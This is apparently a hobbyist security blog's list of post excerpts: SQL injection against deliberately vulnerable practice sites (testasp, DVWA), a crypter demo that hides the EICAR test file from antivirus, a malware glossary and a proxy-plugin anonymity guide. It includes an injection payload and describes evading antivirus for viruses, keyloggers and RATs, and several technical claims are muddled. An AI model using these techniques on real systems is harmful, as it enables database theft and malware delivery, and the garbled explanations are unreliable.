Error based SQL injection on Vulnweb.com

Following my past work, today I breached the "vulnbweb.com/'s" security using the 'Error based SQL injection'. I chose 'testasp.com/showforum.asp?id = 2' as my prey. First I checked exception handling of the web site, by putting a small quote after the 1 in the url(?id = 1'). Now the server responses with an error stating that the server being used is MYSQL, So this made me think a little then I got to the conclusion of using the Error based injection on this site.

To get table name and column name from the table I used the SQL itself, I used the convert() function to produce an error and I will find the table name in this error. Using convert() function in the following way showed the error "id? = 1' and 1 = convert(int,(select top 1 from table_name from information_schema.tables )) #"

Following the same command I got to know the names of column and further the login information, like username and password.

The red line shows that the error produced by the convert command shows the name of the top one file name on the information schema. I found out the users table in the same way and the user details following the same method

Read more

Union based SQL Injection on dvwa

This whole week, I worked on the different ways to attack on a website to get to their database. I did this using SQL injection, I have known about SQL injection from a long time now but I never got an opportunity use them on live website (as using them on a website is illegal). But I found out some websites which allows user to test their skills. I performed the injections on my favorite 'dvwa'.

The first attack I performed on the low security level of dvwa and it is very is easy to find out that the web app is vulnerable, By just putting a small '(quote) in the input field and hitting the submit button, I found out that the app runs on a MYSQL server and then I decided my further steps to penetrate the app.

I first found out number of column present in the database. I did this using the ‘order by’ luckily it just took me three tries to find out the exact number of columns as it is 3. Now I found out the database and the version of database. The version of database was above 5.6.1 so I could use the usual ‘union based injection’ on this web app.
Using the union command of SQL and a single quote I found out the names of tables and columns in the database and then, I got access to the table where the usernames and passwords were stored

Read more

Crypters and Antivirus Softwares

I discussed about different kind of Malwares in my last post, In this post I am going to show a demo on how to use Crypters  and how easily the famous Antivirus can be bypassed using a Cryptering software. For a formal introduction, with Crypters and FUD. 

Crypter

A Crypter is a tool used for encryption, usually I use crpyters for encoding viruses, keyloggers or any RAT tool, I use crpyters on viruses and malwares  to make them undectetable from antiviruses so that they are not deleted by antiviruses. Thus, a crypter is a program that allows me to crypt the source code of my virus or code. What I have read is the antivirus work by splitting source code of application and then search for certain string within source code. If antivirus detects any certain malicious strings, it either stops the scan or deletes the file as virus from system. Thus a crypter basically makes an infected file FUD(Fully Undetectable) or UD(Undetectable) by encrypting it.

In this post I am going to show how I used an easily available crypter to encode a virus and, How I am easily able to bypass many popular anti virus software.

Download a Virus

Here I am going to download a file containing a ’x86 machine language’ code. Which is a legitimate DOS program and produces sensible results when run (it prints the message 'EICAR-STANDARD-ANTIVIRUS-TEST-FILE!'). This code can be downloaded from EICAR’s website

OR

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Copy the above code paste it in a notepad file and save the notepad file with an .exe format

Scan the downloaded file

Now I am going to test the .exe file for a presence of virus on the online virus scanner website, a few of them are mentioned below

•          https://www.metascan-online.com
•      https://www.virustotal.com

·                    

          

Encrypt the file

I used a crpyter to encrypt the file, this software can be easily downloaded, I used ‘CRYPTER  MINI’

                                                  

Now I Browsed the file and clicked on the ‘Make your File Sick!’ button and waited for a while.And saved the file.

Scan the Encrypted file

Now again I scanned the file on ‘https://www.virustotal.com’ now the results are different

            

                 

This shows that many of the popular anti virus are easily bypassed using a simple crypter. How I fool these antivirus softwares

Read more

Malwares

Malware

As wikipedia states "malware" is an umbrella term, used for intrusive softwares, it includes many other terms which on their own requires a little briefing, the terms under this umbrella are 

• Virus
• Worms
• Trojans
• Ransom Wares
• Botnet
• Rootkits.

These are all very confusing terms, today I am going to give an differentiating definitions to all the above terms.

Virus

A computer virus is a code, which when present in a computer system brings unstability  to the system. A true virus cannot replicate itself from one computer system to another computer system without human assistance. It is inactive until it is executed and system has no impact of it’s presence but as soon as it is executed it starts infecting the system. Mostly common function of a computer virus is to replicate it’s copy. Some advance viruses even modifies themselves in their replication process. The major impact of these is the occupation of time of the processor and space on the hard disk

Worms

They come with an advancement in the category ‘virus’, as once they are executed they can transmit or transfer themselves over network, or they have capability of travelling through networks. These can be stopped on if a firewall is implemented between the networks or a good antivirus is present in the system. The basic procedure followed by the firewall and antiviruses to block these worms are to block the ports through they can travel.  Also it does not reuire an attachment program to travel or perform it's function(programmed).

Trojans

Trojans  commonly  known  as Trojan horse. Generally a Trojan horse is non-replicating type of malware. The term is derived from the Ancient Greek story of the wooden horse that was used to help Greek troops invade the city of Troy by stealth. Trojan are generally used for remote accessing to steal or corrupt data. A very important point to note is that, Static IP is used to get remote access of the infected system. There are two kind of Trojans  

1. Direct Trojan
2. Reverse Trojan

These are also known as RAT(Remote Accessing Tool), as they are used to gain remote access to the infected system  

Ransomware

AS the name suggest ‘Ransom Ware ’ are a type of malware stops you from using your PC. It holds your PC or files for ransom. Often the ransomware will claim you have done something illegal with your PC, and that you are being fined by a police force or government agency. These claims are false. It is a scare tactic designed to make you pay the money without telling anyone who might be able to restore your PC. There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.

Bot/Botnets

These are the compromised machines which are used  for DDOS(Distrubuted Denail Of Services) purpose.  And victims of this attack have no clue that they are the part of a serious attach which is going on a particular website. And these bots are instructed to form a network, this network of bots is known as botnet. These botnets are also known as Zombie Army. Thus the bot is known as Zombie. The largest known botnet is 'ZEUS'

Rootkit

A rootkit is a type of software designed to hide the fact that an operating system has been compromised. These kind of malwares are used to encrypt the other kind of malwares. ootkits are used to encapsulate the virus code till the time it will not reach its destination.hence will protect it from detection as sheild on the code. Rootkits allow viruses and malware to “hide in plain sight” by disguising as necessary files that your antivirus software will overlook.

Read more

Implementing anonymity

What should be the first thing one should do after learning anonymity? Of course to be anonymous. I believe that the 'Plugin based proxy servers' are (if not the best) one of the best ways to implement anonymity. I did the same using anonymoX (Chrome based plugin). Now follow the following steps
  

STEP 1:

First I added the plugin to my chrome browser, By just searching anonymox for chrome  on google

 

STEP 2:

Then I clicked on the first link that I saw, and I saw the official anonymox page on chrome app store

 

I clicked on the "add to chrome" dialog box on top right

 STEP 3: 

 To change my identity online ,

          

                                        I click on the icon(capital X) on top right corner 

 Now I saw 

                            

I, then turned on the anonymox and chose from the available option and clicked on 

"Chanage Identity " option.

 

STEP 4:                       

I can check my new online identity on websited like 

• ipcow.com 
• ipchicken.com
• whatsmyip.org 
• or just google "my ip"           

I used googling "my ip" , as it is the fastest among the available option. And now I am completely anonymus online           
                                          
                                                  MY OLD IP ADDRESS ONLINE

                                         
                                                  MY NEW IP ADDRESS ONLINE

Read more